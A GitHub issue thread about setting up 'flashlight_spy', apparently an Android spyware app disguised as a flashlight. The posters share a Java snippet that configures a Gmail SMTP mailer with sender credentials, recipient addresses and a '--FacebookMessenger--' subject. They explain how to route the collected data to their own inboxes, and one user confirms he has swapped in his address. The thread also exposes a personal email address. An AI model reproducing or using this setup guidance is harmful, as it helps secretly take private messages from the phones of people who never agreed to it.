### ISSUE TITLE
123xxx123?

### ISSUE THREAD

**Issue by kartx22** [SpyFlashLight/flashlight_spy#1]
123xxx123 is to be replaced with sender email password or just leave as it is?

**Comment by roger-sd** [comment]
I believe so @ kartx22 , however be careful because the data is also being sent to the string "String[] toArr = {"mehmetduman34500@gmail.com"}; "

```
// TODO Auto-generated method stub
		System.out.println("mail gönderiliyor...");

		MailIki m = new MailIki("youremail@gmail.com","yourpassword"); 

	    //   emailGonder();

			 //String[] toArr = {"mehmetduman34500@gmail.com"}; comment this line when compiling

		       // m.setTo(toArr); comment this line when compiling

		        m.setFrom("youremail@gmail.com"); 

		        m.setSubject("--FacebookMessenger--"); 

		        m.setBody("Email body"); 

		       
```

**Comment by kartx22** [comment]
@roger-sd  ya i noticed it & replaced mehmetduman34500@gmail.com with my email id.

**Comment by zafersn** [comment]
@kartx22 Hi.
This code  `MailIki m = new MailIki("youremail@gmail.com","yourpassword");`  You can enter  as sender mail address.

Here you must write "gmail" mail address. Because the mail provider we use is gmail.

**Refer to.**
 `flashlight_spy/src/com/example/flashlightexample/MailIki.java` , `flashlight_spy/src/com/example/flashlightexample/Mail.java`

`_host = "smtp.gmail.com"; // default smtp server
		_port = "465"; // default smtp port
		_sport = "465"; // default socketfactory port`

@roger-sd 

This code `String[] toArr = {"mehmetduman34500@gmail.com"};`  diffrent  you must write your recipient e-mail address.

You can enter as many email addresses as you want by placing a comma between email addresses.

**Comment by kartx22** [comment]
Thank you @zafersn
